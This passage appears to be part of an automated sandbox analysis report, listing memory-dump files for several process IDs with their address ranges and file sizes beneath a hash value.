
                        f10bc9f91b0c3b497bb1aea79022948d56979f04f86d3992066ade731a776246231c93c1045a57c70514ddd1f3e0d87d9ec88f166f180667adac8f7c2619099c

                      • memory/1548-213-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/1548-223-0x000001E573060000-0x000001E573070000-memory.dmp

                        Filesize

                        64KB

                      • memory/1548-225-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/2216-364-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/2216-366-0x0000022243520000-0x0000022243530000-memory.dmp

                        Filesize

                        64KB

                      • memory/2216-365-0x0000022243520000-0x0000022243530000-memory.dmp

                        Filesize

                        64KB

                      • memory/2216-378-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/2216-376-0x0000022243520000-0x0000022243530000-memory.dmp

                        Filesize

                        64KB

                      • memory/2344-28-0x0000000000100000-0x000000000011E000-memory.dmp

                        Filesize

                        120KB

                      • memory/2344-46-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/2344-105-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/2652-379-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/2652-392-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/2652-380-0x000001FD6A520000-0x000001FD6A530000-memory.dmp

                        Filesize

                        64KB

                      • memory/2652-381-0x000001FD6A520000-0x000001FD6A530000-memory.dmp

                        Filesize

                        64KB

                      • memory/3516-106-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3516-175-0x0000026CAF080000-0x0000026CAF5A8000-memory.dmp

                        Filesize

                        5.2MB

                      • memory/3516-239-0x0000026CAE7A0000-0x0000026CAE7B0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3516-104-0x0000026C94250000-0x0000026C94268000-memory.dmp

                        Filesize

                        96KB

                      • memory/3516-226-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3516-107-0x0000026CAE840000-0x0000026CAEA02000-memory.dmp

                        Filesize

                        1.8MB

                      • memory/3516-108-0x0000026CAE7A0000-0x0000026CAE7B0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3736-350-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3736-351-0x000001604C9E0000-0x000001604C9F0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3736-408-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3736-410-0x000001604C9E0000-0x000001604C9F0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3940-227-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3940-240-0x0000020363B80000-0x0000020363B90000-memory.dmp

                        Filesize

                        64KB

                      • memory/3940-228-0x0000020363B80000-0x0000020363B90000-memory.dmp

                        Filesize

                        64KB

                      • memory/3940-229-0x0000020363B80000-0x0000020363B90000-memory.dmp

                        Filesize

                        64KB

                      • memory/3940-242-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3984-285-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3984-349-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4256-212-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4256-201-0x0000021AE9820000-0x0000021AE9830000-memory.dmp

                        Filesize

                        64KB

                      • memory/4256-200-0x0000021AE9820000-0x0000021AE9830000-memory.dmp

                        Filesize

                        64KB

                      • memory/4256-199-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4344-194-0x000001F527700000-0x000001F527710000-memory.dmp

                        Filesize

                        64KB

                      • memory/4344-198-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4344-183-0x000001F527700000-0x000001F527710000-memory.dmp

                        Filesize

                        64KB

                      • memory/4344-182-0x000001F527700000-0x000001F527710000-memory.dmp

                        Filesize

                        64KB

                      • memory/4344-189-0x000001F527680000-0x000001F5276A2000-memory.dmp

                        Filesize

                        136KB

                      • memory/4344-181-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4344-195-0x000001F527700000-0x000001F527710000-memory.dmp

                        Filesize

                        64KB

                      • memory/4584-422-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4584-420-0x0000028922DF0000-0x0000028922E00000-memory.dmp

                        Filesize

                        64KB

                      • memory/4584-407-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4584-409-0x0000028922DF0000-0x0000028922E00000-memory.dmp

                        Filesize

                        64KB

                      • memory/5100-393-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/5100-406-0x00007FF968E50000-0x00007FF969911000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/5100-395-0x000001BB601A0000-0x000001BB601B0000-memory.dmp

                        Filesize

                        64KB

                      • memory/5100-394-0x000001BB601A0000-0x000001BB601B0000-memory.dmp

                        Filesize

                        64KB